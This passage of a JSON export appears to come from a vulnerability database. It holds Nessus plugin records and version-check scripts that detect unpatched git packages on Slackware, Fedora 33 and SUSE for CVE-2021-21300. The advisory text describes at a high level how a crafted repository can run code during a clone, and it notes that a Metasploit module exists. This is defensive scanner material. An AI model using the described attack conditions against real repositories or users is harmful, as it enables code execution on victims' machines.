value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"git\", pkgver:\"2.17.6\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.17.6\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"git\", pkgver:\"2.17.6\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.17.6\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"git\", pkgver:\"2.17.6\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.17.6\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"git\", pkgver:\"2.30.2\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"git\", pkgver:\"2.30.2\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:44:23", "description": "The remote Fedora 33 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2021-63fcbd126e advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters have to be configured for that. Git for Windows configures Git LFS by default, and is therefore vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5, 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-12T00:00:00", "type": "nessus", "title": "Fedora 33 : git (2021-63fcbd126e)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2022-01-21T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:33", "p-cpe:/a:fedoraproject:fedora:git"], "id": "FEDORA_2021-63FCBD126E.NASL", "href": "https://www.tenable.com/plugins/nessus/147742", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from Fedora Security Advisory FEDORA-2021-63fcbd126e\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147742);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/21\");\n\n script_cve_id(\"CVE-2021-21300\");\n script_xref(name:\"FEDORA\", value:\"2021-63fcbd126e\");\n\n script_name(english:\"Fedora 33 : git (2021-63fcbd126e)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Fedora 33 host has a package installed that is affected by multiple vulnerabilities as referenced in the\nFEDORA-2021-63fcbd126e advisory.\n\n - Git is an open-source distributed revision control system. In affected versions of Git a specially crafted\n repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may\n cause just-checked out script to be executed while cloning onto a case-insensitive file system such as\n NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS). Note that clean/smudge filters\n have to be configured for that. Git for Windows configures Git LFS by default, and is therefore\n vulnerable. The problem has been patched in the versions published on Tuesday, March 9th, 2021. As a\n workaound, if symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks\n false`), the described attack won't work. Likewise, if no clean/smudge filters such as Git LFS are\n configured globally (i.e. _before_ cloning), the attack is foiled. As always, it is best to avoid cloning\n repositories from untrusted sources. The earliest impacted version is 2.14.2. The fix versions are:\n 2.30.1, 2.29.3, 2.28.1, 2.27.1, 2.26.3, 2.25.5, 2.24.4, 2.23.4, 2.22.5, 2.21.4, 2.20.5, 2.19.6, 2.18.5,\n 2.17.62.17.6. (CVE-2021-21300)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2021-63fcbd126e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:git\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Fedora' >!< release) audit(AUDIT_OS_NOT, 'Fedora');\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Fedora');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Fedora 33', 'Fedora ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Fedora', cpu);\n\npkgs = [\n {'reference':'git-2.30.2-1.fc33', 'release':'FC33', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'git');\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:44:27", "description": "This update for git fixes the following issues :\n\nOn case-insensitive filesystems, with support for symbolic links, if Git is configured globally to apply delay-capable clean/smudge filters (such as Git LFS), Git could be fooled into running remote code during a clone. (bsc#1183026, CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : git (SUSE-SU-2021:0757-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21300"], "modified": "2022-01-26T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git", "p-cpe:/a:novell:suse_linux:git-arch", "p-cpe:/a:novell:suse_linux:git-core", "p-cpe:/a:novell:suse_linux:git-core-debuginfo", "p-cpe:/a:novell:suse_linux:git-cvs", "p-cpe:/a:novell:suse_linux:git-daemon", "p-cpe:/a:novell:suse_linux:git-daemon-debuginfo", "p-cpe:/a:novell:suse_linux:git-debuginfo", "p-cpe:/a:novell:suse_linux:git-debugsource", "p-cpe:/a:novell:suse_linux:git-email", "p-cpe:/a:novell:suse_linux:git-gui", "p-cpe:/a:novell:suse_linux:git-svn", "p-cpe:/a:novell:suse_linux:git-svn-debuginfo", "p-cpe:/a:novell:suse_linux:git-web", "p-cpe:/a:novell:suse_linux:gitk", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2021-0757-1.NASL", "href": "https://www.tenable.com/plugins/nessus/147564", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2021:0757-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147564);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\"CVE-2021-21300\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : git (SUSE-SU-2021:0757-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for git fixes the following issues :\n\nOn case-insensitive filesystems, with support for symbolic links, if\nGit is configured globally to apply delay-capable clean/smudge filters\n(such as Git LFS), Git could be fooled into running remote code during\na clone. (bsc#1183026, CVE-2021-21300)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1183026\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-21300/\");\n # https://www.suse.com/support/update/announcement/2021/suse-su-20210757-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7878754c\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Manager Server 4.0 :\n\nzypper in -t patch SUSE-SLE-Product-SUSE-Manager-Server-4.0-2021-757=1\n\nSUSE Manager Retail Branch Server 4.0 :\n\nzypper in -t patch\nSUSE-SLE-Product-SUSE-Manager-Retail-Branch-Server-4.0-2021-757=1\n\nSUSE Manager Proxy 4.0 :\n\nzypper in -t patch SUSE-SLE-Product-SUSE-Manager-Proxy-4.0-2021-757=1\n\nSUSE Linux Enterprise Server for SAP 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-SP1-2021-757=1\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2021-757=1\n\nSUSE Linux Enterprise Server 15-SP1-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-SP1-LTSS-2021-757=1\n\nSUSE Linux Enterprise Server 15-SP1-BCL :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-SP1-BCL-2021-757=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2021-757=1\n\nSUSE Linux Enterprise Module for Development Tools 15-SP3 :\n\nzypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP3-2021-757=1\n\nSUSE Linux Enterprise Module for Development Tools 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Development-Tools-15-SP2-2021-757=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP3 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP3-2021-757=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2021-757=1\n\nSUSE Linux Enterprise High Performance Computing 15-SP1-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-SP1-LTSS-2021-757=1\n\nSUSE Linux Enterprise High Performance Computing 15-SP1-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-SP1-ESPOS-2021-757=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2021-757=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2021-757=1\n\nSUSE Enterprise Storage 6 :\n\nzypper in -t patch SUSE-Storage-6-2021-757=1\n\nSUSE CaaS Platform 4.0 :\n\nTo install this update, use the SUSE CaaS Platform 'skuba' tool. I\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21300\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Git LFS Clone Command Exec');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-svn-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1|2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1/2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2/3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-arch-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-core-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-core-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-cvs-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-daemon-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-daemon-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-debugsource-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-email-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-gui-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-svn-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-svn-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"git-web-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"gitk-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-arch-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-core-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-core-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-cvs-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-daemon-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-daemon-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-debugsource-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-email-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-gui-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-svn-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-svn-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"git-web-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"3\", reference:\"gitk-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-arch-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-core-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-core-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-cvs-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-daemon-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-daemon-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-debugsource-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-email-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-gui-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-svn-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-svn-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"git-web-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"gitk-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"git-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"git-arch-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"git-core-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"git-core-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"git-cvs-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"git-daemon-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"git-daemon-debuginfo-2.26.2-3.31.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", 